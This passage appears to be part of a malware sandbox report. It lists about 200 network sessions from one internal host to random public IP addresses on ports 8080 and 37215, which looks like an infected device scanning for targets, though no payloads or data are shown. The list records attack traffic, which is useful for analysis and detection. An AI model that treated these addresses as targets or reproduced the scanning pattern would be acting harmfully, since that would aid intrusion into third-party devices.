                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34416192.168.2.23445185.78.16.1478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34417192.168.2.2350620196.109.222.1888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34418192.168.2.234406039.226.221.388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34419192.168.2.2337600157.63.26.568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34420192.168.2.2353322208.94.87.208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34421192.168.2.2349778198.14.147.2258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34422192.168.2.2334648196.56.254.1608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34423192.168.2.233370070.115.8.1368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34424192.168.2.234660418.128.189.2128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34425192.168.2.235040694.216.103.2558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34426192.168.2.2342892122.96.176.708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34427192.168.2.233535498.61.127.1488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34428192.168.2.234887845.72.86.1178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34429192.168.2.235747448.203.169.458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34430192.168.2.2333028159.11.175.1888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34431192.168.2.2340732125.62.195.1948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34432192.168.2.2341882129.11.67.1548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34433192.168.2.2333948190.0.19.1448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34434192.168.2.234406299.201.143.1898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34435192.168.2.234702836.128.216.2268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34436192.168.2.234667442.87.219.928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34437192.168.2.234195232.83.91.798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34438192.168.2.2356530158.81.254.15537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34439192.168.2.234511641.30.48.23337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34440192.168.2.23556925.190.252.12137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34441192.168.2.2349528148.50.249.12437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34442192.168.2.2354954197.192.137.20337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34443192.168.2.235686841.29.176.17537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34444192.168.2.235349041.231.206.21437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34445192.168.2.2336534157.214.196.7737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34446192.168.2.236099460.254.36.3737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34447192.168.2.2356430157.228.65.21237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34448192.168.2.2348498157.241.137.3637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34449192.168.2.2340418197.132.45.2937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34450192.168.2.2346700157.83.145.21537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34451192.168.2.2336202197.193.231.23937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34452192.168.2.233811241.199.44.5637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34453192.168.2.2344762157.41.226.12937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34454192.168.2.2360724204.48.234.10537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34455192.168.2.233363041.6.47.1037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34456192.168.2.2342560197.49.53.5237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34457192.168.2.234562441.11.150.3237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34458192.168.2.235825814.86.162.24337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34459192.168.2.2360630157.198.163.11937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34460192.168.2.233652441.184.41.21437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34461192.168.2.2358932113.101.166.24837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34462192.168.2.2354914197.191.215.6437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34463192.168.2.2355334157.27.141.11637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34464192.168.2.2347414197.172.73.13437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34465192.168.2.235050841.115.158.3937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34466192.168.2.2344736157.74.3.5937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34467192.168.2.235862041.98.26.5537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34468192.168.2.2346654197.136.198.10737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34469192.168.2.2351290197.8.24.13137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34470192.168.2.234081441.187.124.2637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34471192.168.2.2334016197.80.166.20237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34472192.168.2.2336212157.193.139.4437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34473192.168.2.23356268.9.178.17637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34474192.168.2.2343636197.113.140.6337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34475192.168.2.235539893.20.188.22537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34476192.168.2.2353032157.248.249.12337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34477192.168.2.2335790193.212.158.5437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34478192.168.2.234951641.218.243.21637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34479192.168.2.2337220197.190.80.6037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34480192.168.2.2333860106.246.15.6737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34481192.168.2.2355002155.38.207.21337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34482192.168.2.2333570197.80.180.22637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34483192.168.2.2356742157.248.149.16737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34484192.168.2.2358120132.67.235.18237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34485192.168.2.2349456121.167.190.18437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34486192.168.2.233845441.9.143.6737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34487192.168.2.2349200157.126.212.20537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34488192.168.2.234166438.80.113.537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34489192.168.2.2352708157.200.75.25037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34490192.168.2.2344216197.139.104.23837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34491192.168.2.235767641.134.32.4237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34492192.168.2.235867441.31.141.2137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34493192.168.2.2340786197.99.31.14937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34494192.168.2.236009241.116.207.18637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34495192.168.2.2355400197.118.231.10037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34496192.168.2.2335554157.111.222.3937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34497192.168.2.2348364177.24.46.6937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34498192.168.2.233968041.132.53.25037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34499192.168.2.2341102157.45.223.8037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34500192.168.2.2352960157.102.77.18937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34501192.168.2.2337966157.92.101.11337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34502192.168.2.235140441.225.251.9637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34503192.168.2.2360114157.92.190.2437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34504192.168.2.2352674197.77.143.17437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34505192.168.2.233537012.156.63.11937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34506192.168.2.2338430157.93.161.10137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34507192.168.2.2350826157.83.16.18737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34508192.168.2.2355234197.174.35.7237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34509192.168.2.235893625.2.96.4937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34510192.168.2.2337824197.222.93.19237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34511192.168.2.235220273.55.7.23537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34512192.168.2.234256041.149.128.22337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34513192.168.2.2351778197.97.71.16437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34514192.168.2.2356942197.173.223.3037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34515192.168.2.2356094157.18.252.15737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34516192.168.2.2344568197.185.7.24537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34517192.168.2.2335324157.100.0.8237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34518192.168.2.235238241.41.112.18137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34519192.168.2.233696841.107.88.23637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34520192.168.2.233881041.94.12.18737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34521192.168.2.2340516197.34.161.15737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34522192.168.2.2345416157.246.229.21337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34523192.168.2.2345506197.92.27.20037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34524192.168.2.2360516157.225.219.17837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34525192.168.2.235761831.159.222.13137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34526192.168.2.235113051.74.228.14637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34527192.168.2.2353890197.108.90.4437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34528192.168.2.234559841.84.47.18037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34529192.168.2.2339116197.192.90.4237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34530192.168.2.2350988197.5.158.837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34531192.168.2.2345876197.61.61.19137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34532192.168.2.2349902197.104.167.15437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34533192.168.2.2335050197.79.76.17837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34534192.168.2.2349310157.95.60.23237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34535192.168.2.2358258157.101.239.2437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34536192.168.2.2342676138.75.183.16137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34537192.168.2.2333578197.15.87.21737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34538192.168.2.235626241.149.76.6637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34539192.168.2.2353326155.119.95.1037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34540192.168.2.2347538197.156.179.13537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34541192.168.2.2338036197.25.28.3037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34542192.168.2.235929658.157.10.2637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34543192.168.2.235798841.85.96.9437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34544192.168.2.2343578157.148.25.21037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34545192.168.2.234820041.66.245.16637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34546192.168.2.2334276157.211.88.19237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34547192.168.2.2357830157.197.19.1837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34548192.168.2.234657241.48.156.2937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34549192.168.2.2339484157.165.26.12837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34550192.168.2.2355588157.241.35.537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34551192.168.2.2333004157.169.124.10237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34552192.168.2.235376241.27.83.10237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34553192.168.2.2347352105.198.54.23737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34554192.168.2.2335376122.111.136.14337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34555192.168.2.2347192197.73.222.10537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34556192.168.2.234380041.166.198.23337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34557192.168.2.2334076197.7.195.12737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34558192.168.2.2335588216.6.235.037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34559192.168.2.2360586157.125.60.1937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34560192.168.2.2355592205.131.65.9537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34561192.168.2.2333878157.117.186.21737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34562192.168.2.2359042157.185.111.14537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34563192.168.2.234162041.97.40.17737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34564192.168.2.234725681.254.98.9537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34565192.168.2.2345590169.12.236.16637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34566192.168.2.233574441.116.121.7837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34567192.168.2.2338276112.246.196.1537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34568192.168.2.2342870109.225.0.18837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34569192.168.2.2354224151.85.121.14737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34570192.168.2.2357950157.26.189.12537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34571192.168.2.235441841.137.164.4337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34572192.168.2.2338912157.150.176.4137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34573192.168.2.235436441.118.184.21737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34574192.168.2.2340960157.112.112.20537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34575192.168.2.2344488157.183.171.22137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34576192.168.2.2354944197.165.181.6437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34577192.168.2.2335754157.30.214.6737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34578192.168.2.234609290.201.74.20837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34579192.168.2.2345942201.250.189.16537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34580192.168.2.2356822184.97.133.18437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34581192.168.2.2352790157.188.13.22037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34582192.168.2.2340720157.212.164.937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34583192.168.2.2341448157.164.243.25337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34584192.168.2.234081249.19.33.4237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34585192.168.2.233957499.159.162.1637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34586192.168.2.2334732152.134.141.19137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34587192.168.2.2334814157.97.152.22237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34588192.168.2.234290041.191.226.14937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34589192.168.2.2344260157.37.92.6637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34590192.168.2.2359994197.115.183.19037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34591192.168.2.2347982153.11.130.13237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34592192.168.2.2347382197.139.3.24737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34593192.168.2.235230482.213.240.17637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34594192.168.2.2355734157.121.212.537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34595192.168.2.2337300157.156.58.25537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34596192.168.2.2352812157.232.149.18837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34597192.168.2.2346694197.1.227.6837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34598192.168.2.2339894197.18.161.3937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34599192.168.2.233718041.27.198.22937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34600192.168.2.2345856197.146.53.22737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34601192.168.2.235827687.252.247.10637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34602192.168.2.234697641.70.217.15837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34603192.168.2.2344154163.32.28.24837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34604192.168.2.2349372197.159.232.13837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34605192.168.2.236077471.178.100.18137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34606192.168.2.2360884197.139.65.8837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34607192.168.2.2349812197.192.102.18537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34608192.168.2.2339706197.174.96.5937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34609192.168.2.234191641.214.93.25437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34610192.168.2.234641441.225.218.21937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34611192.168.2.2334332197.186.7.22637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34612192.168.2.2344014221.143.49.10137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34613192.168.2.2335532193.45.76.8337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34614192.168.2.2355354112.166.70.10237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34615192.168.2.2335862197.255.166.22437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34616192.168.2.233768849.41.202.20037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34617192.168.2.234169241.230.127.3137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34618192.168.2.233999241.57.198.18037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34619192.168.2.2351638197.158.66.18437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34620192.168.2.2356636157.94.194.537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34621192.168.2.2334530197.72.217.18937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34622192.168.2.233503454.235.32.16537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34623192.168.2.236086014.222.252.17137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34624192.168.2.2332992157.26.251.16837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
